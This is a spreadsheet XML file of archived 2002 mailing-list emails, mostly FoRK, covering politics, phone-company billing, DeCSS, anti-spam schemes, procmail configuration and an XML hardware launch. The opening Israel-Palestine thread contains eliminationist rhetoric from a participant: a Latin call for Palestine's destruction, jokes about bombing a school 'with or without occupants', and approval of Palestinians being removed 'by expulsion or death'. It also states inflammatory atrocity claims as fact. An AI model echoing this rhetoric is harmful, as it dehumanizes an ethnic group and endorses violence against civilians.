&gt;&gt; http://reason.com/brickbats/bb-april.shtml
&gt;&gt;
&gt;&gt; Links to:
&gt;&gt;
&gt;&gt;
&gt; http://www.cnsnews.com/ 
&gt; ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
&gt;&gt; ve\200208\FOR20020807e.html
&gt;&gt;
&gt;&gt; Praeterea censeo Palestininem esse delendam.
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;&gt;
&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
It wasn't gloating, it was one for the horror file.And of course for the Palestinians it wasn't a mistake, which is a key
part of the horror.I'm not against American taxpayers remodeling a school honoring a killer
if we do it with a daisy cutter.&gt; -----Original Message-----
&gt; From: Geege Schuman [mailto:geege@barrera.org]
&gt; Sent: Saturday, October 05, 2002 9:35 PM
&gt; To: johnhall@evergo.net; FoRK
&gt; Subject: RE: Our friends the Palestinians, Our servants in government.
&gt; 
&gt; she read the links. what must it be like, she wondered, to devote ones
&gt; life
&gt; to pointing out  neighbors' mistakes, mishaps, inconsistencies and
&gt; frailties?
&gt; 
&gt; gloating is definitely underrated in the good book - eh, john?
&gt; 
&gt; bring it on,
&gt; gg
&gt; 
&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
John
&gt; Hall
&gt; Sent: Saturday, October 05, 2002 11:56 PM
&gt; To: FoRK
&gt; Subject: Our friends the Palestinians, Our servants in government.
&gt; 
&gt; 
&gt; 
&gt; 
&gt; Hijacker High (8/30)
&gt; Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus
&gt; hijacking in which 36 Israelis and an American nature photographer,
Gail
&gt; Ruban, were killed. Mughrabi has a Palestinian high school named after
&gt; her, and it's apparently starting to show signs of wear. Fortunately,
&gt; the United States Agency for International Development has stepped in
&gt; with money to help renovate it.
&gt; 
&gt; http://reason.com/brickbats/bb-april.shtml
&gt; 
&gt; Links to:
&gt; 
&gt;
http://www.cnsnews.com/ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
&gt; ve\200208\FOR20020807e.html
&gt; 
&gt; Praeterea censeo Palestininem esse delendam.
&gt; 
&gt; 
&gt; 
&gt; 
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message ----- 
From: "John Hall" 
&gt; 
&gt; I'm not against American taxpayers remodeling a school honoring a killer
&gt; if we do it with a daisy cutter.
With or without occupants?
</t>
  </si>
  <si>
    <t>John Hall wrote:&gt;It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years.Owen</t>
  </si>
  <si>
    <t>see my first line: I READ THE LINKS.  brickbats.  idiot.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of Owen
Byrne
Sent: Sunday, October 06, 2002 9:21 AM
To: johnhall@evergo.net
Cc: 'Geege Schuman'; 'FoRK'
Subject: Re: Our friends the Palestinians, Our servants in government.
John Hall wrote:&gt;It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years.Owen</t>
  </si>
  <si>
    <t xml:space="preserve">When a settler goes postal and kills some Palestinians they are treated
as a criminal, not celebrated in word and song.But you knew that.When a Palestinian sets out, to great rejoicing, to attempt to target
children with a homicide-bomb, they are careful to dip the shrapnel in
rat poison.  It helps prevent blood clotting in the victims, you see.I'm sure all those Jewish homicide-bombers do the same.  Oh wait, there
aren't any.If the Palestinians are driven completely out, either by expulsion or
death, they will have nobody to blame but themselves.  That won't stop
them or you from pretending otherwise.
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Owen
&gt; Byrne
&gt; I'm sure the plan is that it will be renamed for the settler who kills
&gt; the last Palestinian in a few years.
&gt; 
&gt; Owen
&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">when brickbats or fox exposes the folly of government they do so to
accomplish a specific end; dumping truckload after truckload of bad acts
proves their point: stupidity and greed typify government, therefore any
government is too much government.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of John
Hall
Sent: Sunday, October 06, 2002 5:03 PM
Cc: 'FoRK'
Subject: RE: Our friends the Palestinians, Our servants in government.
Yes, you read the links.Sorry, but exposing folly is not only humorous but also instructive.  It
is only by exposing folly to ridicule that you stop it in the first
place.'Brickbats' leans heavily on both, though the item I highlighted was a
'horror' item not a 'gee that is stupid' item.  For an example of the
latter, see the city that wanted a woman to pay a ticket for parking in
an UNmarked no-parking space.&gt; From: Geege Schuman [mailto:geege@barrera.org]
&gt;
&gt; see my first line: I READ THE LINKS.  brickbats.  idiot.
</t>
  </si>
  <si>
    <t xml:space="preserve">Yes, you read the links.Sorry, but exposing folly is not only humorous but also instructive.  It
is only by exposing folly to ridicule that you stop it in the first
place.'Brickbats' leans heavily on both, though the item I highlighted was a
'horror' item not a 'gee that is stupid' item.  For an example of the
latter, see the city that wanted a woman to pay a ticket for parking in
an UNmarked no-parking space.&gt; From: Geege Schuman [mailto:geege@barrera.org]
&gt; 
&gt; see my first line: I READ THE LINKS.  brickbats.  idiot.
</t>
  </si>
  <si>
    <t>I call PacBell/SBC every two or three months about a recurring problem 
we have at my house:We get a phone bill every month for someone who no longer lives at our 
house for a phone line which has been disconnected for over three years 
and the account balance is (drum roll please) $0.00! Sometimes the 
people I talk to cannot locate the account in their system and tell me 
that the phone number doesn't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$0.00 and then they say somthing along the 
lines of "Huh?" or "I'm not sure what's going on... Hold please." And 
eventually I have similar conversations with their managers and the 
account representatives and billing people and their managers and their 
managers' managers ad naseum.The outcome of every phone call is that they'll "look into it" and fix 
the problem and I might receive one or two more bills depending on when 
it's resolved. So I wait a month or two and send the bills back marked 
"Not at this address, please fsck off." and then eventually call them 
back and go through the whole process again. Lately I just explain to 
the phone jockeys that I know it's not their fault and I'm not mad at 
them and it's just not their day because I'm about to give them hell. 
Then I give them the opportunity to have me yell at their boss which 
they seem all too happy to do.At least it gives me a positive way to vent my aggressions and it's a 
lot cheaper than seeing a therapist.Perplexed,
Elias
bitbitch@magnesium.net wrote:&gt;
&gt;So I get a check from Pac Bell today (SBC as they're called now).
&gt;Turns out, they went to the trouble of printing out, signing, sealing
&gt;and stamping a check just to refund me for a whole $0.33.
&gt;
&gt;[...]
&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">It was a kick when an apt manager kept mailing me a notice that I owed 
them .08.  I just waited to see how many times they'd mail me a notice.  7 
times by the time I left and paid them the .08.  Funny thing was, I lived 
right behind the office where it was mailed from.  (:
CindyOn Mon, 7 Oct 2002 bitbitch@magnesium.net wrote:&gt; 
&gt;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"I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 7 Oct 2002 bitbitch@magnesium.net wrote:--]I'm truly stuck on this though.  I don't know whether to frame the
--]check, burn it, or cash it in.I framed my 2$ check from mp3.com. Someone bought the Cd I have up there
some years back and it is my real and actual proof in saying I am a paid
musician. Of course I never cashed the check so techinaly I never did get
paid...but thats another matter alltogther.
</t>
  </si>
  <si>
    <t xml:space="preserve">I knew it'd be a day for insanity.so anyway, news.com decided to write up two wonderful articles on the
DMCA and decided to link to decss.exe, the very verboten code that
ended up getting 2600 (but none of the other news services that
originally linked) spanked.Slashdot, of course, links to them.So now, I link to slashdot.http://slashdot.org/articles/02/10/07/1331217.shtml?tid=123I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(asleep/self-interested/bought).
Its giving me a real cynical view on being a lawyer, thats for sure.-- 
Best regards,
 bitbitch                          mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t>Dave Long wrote:&gt;&gt;
&gt;&gt;    
&gt;&gt;
&gt;&gt;&gt;"The United States is the only country in the world to tax its citizens
&gt;&gt;&gt;on a worldwide basis, ...
&gt;&gt;&gt;      
&gt;&gt;&gt;
&gt;
&gt;I am told this is also true (at least)
&gt;for Australia.  I suppose I shouldn't
&gt;rely upon editorial fact-checking.
&gt;
&gt;::::::
&gt;
&gt;  
&gt;
&gt;&gt;                              If they manage to emulate the process
&gt;&gt;that occurred in Northern Ireland, then maybe in 20 years or so
&gt;&gt;they'll be yelling at each other across the floor of some legislative
&gt;&gt;assembly instead.  Label me an optimist.
&gt;&gt;    
&gt;&gt;
&gt;
&gt;Since "let's you and him fight" worked
&gt;so remarkably poorly in Ireland, there
&gt;must've been plenty of places it worked
&gt;well for the British to have tried it
&gt;again in Israel.  What were they?
&gt;
&gt;-Dave
&gt;  
&gt;
I'm not sure what you mean by "let's you and him fight", but it is 
important to remember that England was in control of Ireland
for 300 years, and that it was only thanks to the distraction of WW I 
that the south managed to gain its independence. If you mean
splitting countries upon arbitrary lines and assigning different groups 
to opposite sides of the line, it also seems to have not worked in
India/Pakistan.
I suppose Canada, which is supposed to be a "loose confederation" of 2 
founding nations (French and English) can be cited as a success. The 
jury is still out, but so far only a few brief rebellions and 
referendums and such, still together after 130+ years.Owen</t>
  </si>
  <si>
    <t xml:space="preserve">
I know I heard of this a few years back but Wired and Slashyrot are both
running stories on 10mbs data transfer via human touch.Oh I can see it now, The first bicostal file exchange system that will see
the newsest Offspring tunes distribute by handshake, copulation and
moshpiting.http://www.newscientist.com/news/news.jsp?id=ns99992891
http://www.news.com.au/common/story_page/0,4057,5239758%255E13762,00.html
http://slashdot.org/articles/02/10/07/0238234.shtml?tid=100</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Tom,Monday, October 7, 2002, 4:45:02 PM, you wrote:
T&gt; I know I heard of this a few years back but Wired and Slashyrot are both
T&gt; running stories on 10mbs data transfer via human touch.T&gt; Oh I can see it now, The first bicostal file exchange system that will see
T&gt; the newsest Offspring tunes distribute by handshake, copulation and
T&gt; moshpiting.T&gt; http://www.newscientist.com/news/news.jsp?id=ns99992891
T&gt; http://www.news.com.au/common/story_page/0,4057,5239758%255E13762,00.html
T&gt; http://slashdot.org/articles/02/10/07/0238234.shtml?tid=100Wow.  I'm just wondering how the earliest adopter of all new
technologies, the porn market will spin this one... "New... Now you can transfer porn while you screw!'  Talk about
 exchanging energy.-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t>They are legally required to do that.  I got a similar check because an
insurance company didn't pay a claim quickly enough.  It might have been
$.02.Although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</si>
  <si>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 xml:space="preserve">
JH&gt; They are legally required to do that.  I got a similar check because an
JH&gt; insurance company didn't pay a claim quickly enough.  It might have been
JH&gt; $.02.JH&gt;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Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
</t>
  </si>
  <si>
    <t>On Mon, 2002-10-07 at 12:48, Owen Byrne wrote:
&gt; I suppose Canada, which is supposed to be a "loose confederation" of 2 
&gt; founding nations (French and English) can be cited as a success. The 
&gt; jury is still out, but so far only a few brief rebellions and 
&gt; referendums and such, still together after 130+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70% of Albertans favor separating from Canada, and over
several distinct issues.The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inter-mountain West of the US.  Unlike the US case though, the rest of
Canada would really be hurting if they weren't receiving all those tax
dollars from Alberta.  OTOH, Alberta would probably thrive.I have friends in Alberta, and visit occasionally, but I'm not totally
clear on everything that goes on in that country, due to my partial
unfamiliarity with how the government works up there, so I'm a little
fuzzy on some of the details.  What I do know is that on average the
Albertans are quite unhappy with their current position in Canada and
the sentiment has been getting worse over the years.Cheers,-James Rogers
 jamesr@best.com</t>
  </si>
  <si>
    <t xml:space="preserve">Why am I so passionate about decentralization? Because I believe some of 
todayâ€™s most profound problems with networked applications are caused by 
centralization.Generically,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todayâ€™s most popular architectural style for developing 
network applications: client-server interaction using request-response 
communication protocols.I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lowest-latency connection to a 
centralized auction server. Sharing ad-hoc wireless networks is yet a 
third example of decentralized resource allocation. Furthermore, as 
abstract as centralization-induced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
</t>
  </si>
  <si>
    <t>Chris Haun wrote:
&gt; A LifeGem is a certified, high quality diamond created from the carbon of 
&gt; your loved one as a memorial to their unique and wonderful life.Why wait until you're dead? I'm sure there's enough carbon in
the fat from your typical liposuction job to make a decent diamond.- Joehttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
Dave
&gt; Long
&gt; Sent: Thursday, August 22, 2002 11:12 AM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: RE: The Curse of India's Socialism
&gt; 
&gt; 
&gt; 
&gt; When I'd read that "getting legal title
&gt; can take 20 years", when I believe that
&gt; 1 year ought to be more than sufficient,
&gt; (and helped by the Cairo reference) I'd
&gt; assumed that we were talking about the
&gt; urban poor.
&gt; 
&gt; If I see people living in mansions, or
&gt; even in suburban subdivisions, I assume
&gt; they didn't have too much trouble with
&gt; their titles.Pg 177:
In another country, a local newspaper, intrigued by our evidence of
extralegal real estate holdings, checked to see if the head of state's
official residence had a recorded title.  It did not.Pg 92:
The value of land in the formal sector of Lima averages US$50 per square
meter, whereas in the area of Gamarra, where a great deal of Peru's
informal manufacturing sector resides, the value per square meter can go
as high as US$3,000.==========I'd have made the same assumption you did.  De Soto says that isn't
correct.  You can find mansions that don't have title.  A lot of them,
in fact.  But they can't be used for collateral for a loan, or otherwise
participate as 'capital' because of their extra-legal status. 
&gt; &gt; Mr. Long, I think you'd particularly enjoy the De Soto work.
&gt; 
&gt; On the "to find" list.  Any chance of
&gt; an explanation of that "Bell Jar" in
&gt; the meantime?French historian Fernand Braudel (so Braudel's Bell Jar, not De Soto's)==&gt;The key problem is to find out why that sector of society of the past,
which I would not hesitate to call capitalist, should have lived as if
in a bell jar, cut off from the rest; why was it not able to expand and
conquer the whole of society? ... [Why was it that] a significant rate
of capital formation was possible only in certain sectors and not in the
whole market economy of the time? ... It would perhaps be teasingly
paradoxial to say that whatever was in short supply, money certainly was
not ... so this was an age where poor land was bought up and magnificent
country residents built ... [How do we] resolve the contradiction ...
between the depressed economic climate and the splendors of Florence
under Lorenzo the Magnificent?
 --------------De Soto's theory is that the Bell Jar is formed when you segregate those
who have *practical* access to legal property rights and those who do
not.  The poor[1] have property -- lots and lots of property.  What they
don't have is access to the systems where we turn property into capital
and allow it to start growing.  Their property can only be exchanged
with a small section of people who know them personally.[1] Actual poor people, not 'poor' Americans with a living standard that
is the envy of most of the world.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t xml:space="preserve">
Political mail (the snail kind) doesn't bother me.  I like it a lot of the 
time, because as crap as it is at least it's not the kind of info you get 
on TV.  Particularly for small time local politics, it's the best way to 
get information.but what matters is that mail is speech, and political email has to be as
well protected as any other political speech.  Spam is *the* tool for
dissident news, since the face that it's unsolicited means that recipients
can't be blamed for being on a mailing list.
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>On Fri, 23 Aug 2002, Robert Harley wrote:
--]It's an amusing anecdote, I don't know if it's true or not, but certainly
--]nothing here supports the authoritative sounding conclusion "Status: False".
--]So thats the trick, just let any anecdotal utterances you LIKE be deemed
true until proven false, and then hold other data to the opposite
standard...Yeah, I see how that could be a handy tool RH.
(before teh lablemongers are out and about, I could give a shit what
BubbaU utters, its all shite. Kill your idols folks, your slips are
showing)-tomhttp://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>I wrote:
&gt;I personally doubt it simply because I never heard of Bush and Chirac
&gt;going to Brighton.Actually it doesn't say that they did, just that Blair spoke to
Williams there.R
http://xent.com/mailman/listinfo/fork</t>
  </si>
  <si>
    <t>bitbitch@magnesium.net wrote:
 &gt; Well Beberg, unless you're really into Anime and actually hold true
 &gt; that dead people can send email, I think Geege's subject is just
 &gt; dandy.Funny you should mention that, as I just came back from refilling
the green coolant in my Navi. &gt; (bonus FoRK points if Adam knows what anime i'm refering to)I guess I don't get any points, do I? No, didn't think so.- JoeP.S. We've just started watching Boogiepop Phantom...-- 
The Combatant State is your father and your mother, your only
protector, the totality of your interests. No discipline can
be stern enough for the man who denies that by word or deed.</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002 bitbitch@magnesium.net wrote:&gt; Well Beberg, unless you're really into Anime and actually hold true
&gt; that dead people can send email, I think Geege's subject is just dandy.
&gt; Especially since she removed herself from the hive that is aol (and
&gt; placed herself unto another, but hey :-))Bandwidth is bandwidth. AOL is still the only mom-friendly place to get it.&gt; *ducks and runs*What, like i'm not skilled with a bow? You better run really fast :-P&gt; (bonus FoRK points if Adam knows what anime i'm refering to)Well lets see, about 99% of all anime? In anime dead people can talk, email,
hang out, and generally lead normal lives. Come to think of it they tend to
be the primary characters ;)But I suspect you mean Serial Experiments Lain, in which the initial "i'm
not dead yet" is via email.- Adam L. "Duncan" Beberg
  http://www.mithral.com/~beberg/
  beberg@mithral.com
</t>
  </si>
  <si>
    <t>At 8:43 PM -0700 8/21/02, Ed Greenberg wrote:
&gt;At 11:19 PM 8/20/2002 -0700, dan@dankohn.com wrote:
&gt;
&gt;&gt;The nature of our patent is about putting a warrant mark in RFC 2822
&gt;&gt;X-headers (or in the body) to allow senders to warrant their mail as
&gt;&gt;*not-spam*, and then to use copyright and trademark infringement to
&gt;&gt;enable Habeas to enforce that warranty.Why is it that I envision Verisign doing something like this.  Yeah, 
like I want Verisign to sign all my spam, er, mail for me.  Pay them 
enough and they'd probably sign spam too. ;)J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</si>
  <si>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20 Aug 2002, Matthew Cline wrote:&gt; On Tuesday 20 August 2002 07:57 pm, Harold Hallikainen wrote:
&gt; &gt; http://www.wired.com/news/technology/0,1282,54645,00.html
&gt; 
&gt; Summary: a company will offer short snippets of original, copyrighted
&gt; and trademarked text that can be inserted into email message headers,
&gt; and email filters can recognize this as a "not-spam" indicator.  Any
&gt; spammers who use the text will be sued for copyright and trademark
&gt; infringement.They may be in for a patent fight before any of this goes forward:http://www.eweek.com/article2/0,3959,476558,00.asp"Banking on the fact that few enterprises sending commercial mail want to 
be associated with spam, IronPort Systems Inc., in San Bruno, Calif., has 
developed the Bonded Sender program in an effort to give legitimate bulk 
e-mailers some credibility."-------------------------------------------------------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</si>
  <si>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Suppose I created a rule that was in this form:body RULE_NAME /text to delete/dWould the "/d" delete this text from the body and mask it from the rest of the 
rules? If so - I'm thinking about applying it to Yahoo and SN and Juno ads so 
that FPs are reduced.-------------------------------------------------------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</si>
  <si>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At 3:59 PM +0100 8/22/02, Justin Mason wrote:
&gt;Justin Shore said:
&gt;
&gt;&gt;  I just ran across a false positive that scored 8.6.  The message was
&gt;&gt;  a solicited ad from Apple.com on educator deals.  I can send a copy
&gt;&gt;  if anyone wants it.
&gt;
&gt;Yes, please do send it on, and I'll add it to the non-spam corpus.To any particular address?  I checked the lists page but didn't see 
an address to see a FP to.&gt;To date, the scores evolved by SpamAssassin are very biased towards
&gt;non-HTML, non-newsletter-ish mail.  This release should be different, as
&gt;I've been spending the last month signing up a "nonspamtrap" to every
&gt;legit newsletter I can find ;)That's understandable.  HTML mail is the worst thing since female 
shoe sales at the mall. ;-)  Signup for the cruisercustomizing.com 
newsletter.  Great place to find and review motorcycle parts. :)&gt;This should mean that tests which match common-enough newsletter practices
&gt;will no longer get such high scores once we re-run the GA.Sound pretty slick.  If I come across any more legit newsletters, 
I'll send them your way.Thanks for the info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</si>
  <si>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I'm fairly confused here, with Procmail. 
I know this isn't a procmail list per-se; feel free to answer my questions in 
private email to r_gilmanhunt@hotp.com.  I've looked for web-stuff to answer this question but I can't find anything 
specific on this scenario.Here's the situation. 
I have a global /etc/procmailrc file. It works, and when I insert stuff into 
it for logging (LOGFILE=/root/procmail.log, VERBOSE=yeah. LOGABSTRACT=all) it 
shows up where I expect it to (the log in /root/procmail.log)  At the end of 
this file, I use 
 :0fw
 | spamc
to call spamassassin.Also in it is a carboncopy recipe (yes, I know, it's one of the evils we do 
for our corporate masters)  (at the top) (to their credit, I am instructed 
that they are not interested in the actual contents, but are concerned about 
future lawsuits and their culpability, so they want a record made. Discussion 
on this point is immaterial)
:0
  * ? test -d $ARCHIVEDIR/$DATEDIR || mkdir -p --mode=750 $ARCHIVEDIR/$DATEDIR
  { }
:0 c
 $SAVEATI have several users where I forward certain spams to /dev/null  . . .their 
procmailrc file (/home/$user/.procmailrc) looks like this:
:0
  * ^From: .*spermfun.com
  /dev/nullNow I've got a person who needs a copy of her inbound emails sent to another 
email address (outside the company), so I've got this recipe in her 
/home/$user/.procmailrc file:
:0 c
  !user@domain.tldIt almost looks like procmail's not running a user's copy recipe after a 
global copy recipe, except that I can replace that user's one with 
:0 
 * ^Subject: .*test
  procmail.holder
and get the same result.The result, to put it succinctly, is "nothing". No forwards go out, no files 
are made, if I try to log information, no logs are set up. I've modified the 
user/group and permissions to match known-working recipes (the spermfun 
example above) and still nothing.  However, I can redirect those other 
messages.  In other words- just this user's procmailrc file is not working- 
other users have no problems.Any suggestions would be helpful :) -Russ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</si>
  <si>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Interesting.  It's possible, of course, that the shitty economy 
is hurting the spammers as much as anyone else.  But if you've 
been aggressively reporting, then it could just be that.  Could 
be your upstream ISP is being more aggressive too...COn Wednesday, August 21, 2002, at 05:02  PM, Karsten M. Self wrote:&gt; ...what these plots *don't* show is the drop from ~55 
&gt; mails/daily to ~30
&gt; daily that I've seen at work, since 1st week of May, when spam receipts
&gt; peaked.  Not sure if it's aggressive reporting that's getting us off
&gt; lists, or if other people are seeing similar.-------------------------------------------------------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</si>
  <si>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Theo Van Dinter said:&gt; &gt;         nonspam-theo.log
&gt; 
&gt; Hmmm.  I did re-run mass-check and resubmit...  I sort the log by score,
&gt; so the timestamp is at the end:ah, OK.  didn't see that.--j.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</si>
  <si>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At 1:16 PM -0400 8/22/02, Theo Van Dinter wrote:
&gt;On Thu, Aug 22, 2002 at 07:05:33PM +0200, Malte S. Stretz wrote:
&gt;&gt;  Ummm... has somebody noticed that spamassassin-sightings is the fourth most
&gt;&gt;  active list for this month on [1]? There is more sighting than talk and
&gt;&gt;  devel together ;-)
&gt;
&gt;hmmm.  do people know that they should only send false negatives there?
&gt;either there's a lot of stuff SA is missing, or some people are just
&gt;sending all their spam there.I've sent in some spam that either didn't score or scored practically 
nothing, like below 5.  I figure that most people run at 5 so if it 
scores less than that, a rule needs to be honed to catch it.Justin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</si>
  <si>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On Thu, 22 Aug 2002 the voices made Justin Mason write:&gt;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
</t>
  </si>
  <si>
    <t xml:space="preserve">No analysis yet... don't know what to make of it yet. But here's the raw 
bits for all to peruse and check out what's really going on... Best, 
Rohit===========================================================DataPower delivers XML acceleration device
ByÂ Scott Tyler Shafer
August 27, 2002 5:46 am PTDATAPOWER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data.According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
conceived to meet the steady adoption of XML, the anticipated future 
proliferation of Web services, and as a means to share data between two 
businesses."Our vision is to build out an XML-aware infrastructure," Kelly said. 
"The XA35 is the first of a family."Kelly explained that converting data into XML increases the file size up 
to 20 times. This, he said, makes processing the data very taxing on 
application servers; DataPower believes an inline device is the best 
alternative.In addition to the large file sizes, security is also of paramount 
importance in the world of XML."Today's firewalls are designed to inspect HTTP traffic only," Kelly 
said. "A SOAP packet with XML will go straight through a firewall. 
Firewalls are blind to XML today."Future products in DataPowers family will focus more specifically on 
security, especially as Web services proliferate, Kelly said.According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explained.The 1U-high network device has been tested against a large collection of 
XML and XSL data types and can learn new flavors of the markup language 
as they pass through the device.The XA35 can be deployed in proxy mode behind a firewall and a load 
balancer, and it will inspect all traffic that passes and will identify 
and process those packets that are XML, Kelly said.In addition to proxy mode, the device can also be used as an application 
co-processor. This deployment method gives administrators more granular 
control over what data is inspected and the application server itself 
controls the device.DataPower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today.Leveraging the detailed knowledge and customer experience gained from 
developing software-based accelerators, Kuznetsov's team raised the bar 
and designed a system for processing XML in purpose-built hardware. In 
2001, DataPower's effort produced XML Generation Three (XG3â„¢), the 
industry's fastest technology for XML processing, bar none.Today, XG3â„¢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partners.DataPower's M.I.T. heritage is complemented by a management team that 
brings decades of experience in the networking and computing industries, 
drawing veteran leaders from several successful companies including 
Akamai, Argon, Cascade, Castle Networks, Sycamore and Wellfleet.=========================================================================DataPower Technology Secures $9.5 Million in FundingVenrock Associates, Mobius Venture Capital and Seed Capital Back Pioneer 
in XML-Aware Networking for Web ServicesCAMBRIDGE,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DataPowerâ€™s Board of 
Directors.DataPower will use this funding to accelerate development, marketing and 
sales of the companyâ€™s breakthrough technology for XML-Aware networking. 
Founded in 1999, DataPower invented the worldâ€™s first intelligent XML 
networkingÂ devices, capable of transforming XML traffic and transactions 
at the wire-speed enterprises need to effectively embrace Web services 
and other XML-centric initiatives. DataPowerâ€™s solutions are based on 
its patent-pending XML Generation Three (XG3â„¢) technology."Enterprises are adopting XML at rapid rate to facilitate inter-and 
intra-company communications but their network infrastructure is ill 
prepared to support the requirements of this new traffic type. 
DataPowerâ€™s XML-acceleration devices enable the wirespeed processing of 
XML that is required to support next generation enterprise 
applications," said Eugene Kuznetsov, CTO and founder of DataPower 
Technology."DataPower gives companies the ability to use XML thatâ€™s critical to Web 
services projects without sacrificing an ounce of performance." A single 
DataPower acceleration engine delivers the processing power of 10 
serversâ€”breaking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reports."In the post-bubble economy, technology investment decisions require 
laser-focused scrutiny. DataPowerâ€™s patent-pending technology addresses 
a very real and growing pain point for enterprises," said Michael 
Tyrrell of Venrock Associates. "By turbo-charging their networks with 
DataPowerâ€™s unique XML-Aware networking technology, companies will be 
free to adopt next generation Web services without encountering 
performance and security pitfalls.""We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(XG3)Â technology was quite simply the single most 
compelling technology solution we have seen to date.""XML is not a nice-to-have, it is a must have for enterprises serious 
about optimizing application efficiency. Since 1999, DataPower has been 
developing solutions to facilitate enterprise use of XML and Web 
services," said Jeff Fagnan of Seed Capital Partners. "DataPowerâ€™s 
XML-acceleration devices are a key requirement for enterprises that rely 
on XML for mission critical applications."About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Capitalâ€™s portfolio includes Spearhead Technologies, Concentric Visions 
and CompanyDNA. For more information on Seed Capital Partners, please 
visit www.seedcp.com.About DataPower Technology
DataPower Technology provides enterprises with intelligent XML-Aware 
network infrastructure to ensure unparalleled performance, security and 
manageability of next-generation protocols. DataPowerâ€™s patent-pending 
XML Generation Three (XG3â„¢) technology powers the industryâ€™s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Associates.CONTACT:DataPower Technology, Inc.
Kieran Taylor
617-864-0455
kieran@datapower.comSchwartz Communications
John Moran/Heather Chichakly
781-684-0770
datapower@schwartz-pr.com========================================================================Steve Kelly, chairman and CEODuring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College.Eugene Kuznetsov, founder, president and CTOEugene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MIT.Steve Willis, vice president of advanced technologySteve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Massachusetts.Bill Tao, vice president of engineeringWith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Illinois.Kieran Taylor, director of product marketingKieran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Board of AdvisorsMark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
</t>
  </si>
  <si>
    <t xml:space="preserve">
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
James
&gt; Rogers&gt; Subject: Re: The Curse of India's Socialism
&gt; 
&gt; On Tue, 2002-08-20 at 15:01, Ian Andrew Bell wrote:&gt; &gt; They
&gt; &gt; finished their routine with the a quadruple lutz -- laying off
&gt; &gt; hundreds of thousands of workers when it all came crashing down.
&gt; 
&gt; So what?  Nobody is guaranteed employment.  Laying people off is not a
&gt; crime nor is it immoral.  Companies don't exist to provide employment,
&gt; nor should they.  The closest we have to such a thing in the US is a
&gt; Government Job, and look at the quality THAT breeds.And further, why focus on the fact they were laid off and not on the
fact they were hired in the first place?BTW: I saw someone claim that aside from the efficiency of the market
there were also gains to society from irrational behavior.If a society has business people that systematically overestimate their
chances, that is bad for the businessmen but on net a big gain for
society.  On the social level, the law of averages works to societies
benefit in a manner it can't for an individual.A key reason, in this view, that the US wound up outperforming England
was that the English investors were too rational for their societies own
good.(Except, of course, when US investors were bilking them to build canals
and railroads over here.  Thanks, guys.)=====================Applied to telecom: a lot of dark wire (glass) and innovation will
eventually be used for pennies on the dollar, the benefits to society
and the costs to the investors.
</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t xml:space="preserve">If it's not stateful, it wouldn't seem to be worth the effort, although I guess it might help with DDoS attacks.Sounds snake-oilish to me, but I'm biased by lots of experience with firewalls and proxy servers, and the limitations thereof.Ken
&gt; -----Original Message-----
&gt; From: Rohit Khare [mailto:khare@alumni.caltech.edu]
&gt; Sent: Tuesday, August 27, 2002 5:00 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: DataPower announces XML-in-silicon
&gt; 
&gt; 
&gt; No analysis yet... don't know what to make of it yet. But 
&gt; here's the raw 
&gt; bits for all to peruse and check out what's really going on... Best, 
&gt; Rohit
&gt; 
&gt; ===========================================================
&gt; 
&gt; DataPower delivers XML acceleration device
&gt; ByÂ Scott Tyler Shafer
&gt; August 27, 2002 5:46 am PT
&gt; 
&gt; DATAPOWER TECHNOLOGY ON Monday unveiled its network device designed 
&gt; specifically to process XML data. Unlike competing solutions that 
&gt; process XML data in software, DataPower's device processes 
&gt; the data in 
&gt; hardware -- a technology achievement that provides greater 
&gt; performance, 
&gt; according to company officials.
&gt; 
&gt; The new device, dubbed DataPower XA35 XML Accelerator, is the 
&gt; first in a 
&gt; family of products expected from the Cambridge, Mass.-based 
&gt; startup. The 
&gt; DataPower family is based on a proprietary processing core technology 
&gt; called XG3 that does the analysis, parsing, and processing of the XML 
&gt; data.
&gt; 
&gt; According to Steve Kelly, CEO of DataPower, the XA35 Accelerator was 
&gt; conceived to meet the steady adoption of XML, the anticipated future 
&gt; proliferation of Web services, and as a means to share data 
&gt; between two 
&gt; businesses.
&gt; 
&gt; "Our vision is to build out an XML-aware infrastructure," Kelly said. 
&gt; "The XA35 is the first of a family."
&gt; 
&gt; Kelly explained that converting data into XML increases the 
&gt; file size up 
&gt; to 20 times. This, he said, makes processing the data very taxing on 
&gt; application servers; DataPower believes an inline device is the best 
&gt; alternative.
&gt; 
&gt; In addition to the large file sizes, security is also of paramount 
&gt; importance in the world of XML.
&gt; 
&gt; "Today's firewalls are designed to inspect HTTP traffic only," Kelly 
&gt; said. "A SOAP packet with XML will go straight through a firewall. 
&gt; Firewalls are blind to XML today."
&gt; 
&gt; Future products in DataPowers family will focus more specifically on 
&gt; security, especially as Web services proliferate, Kelly said.
&gt; 
&gt; According to DataPower, most existing solutions to offload XML 
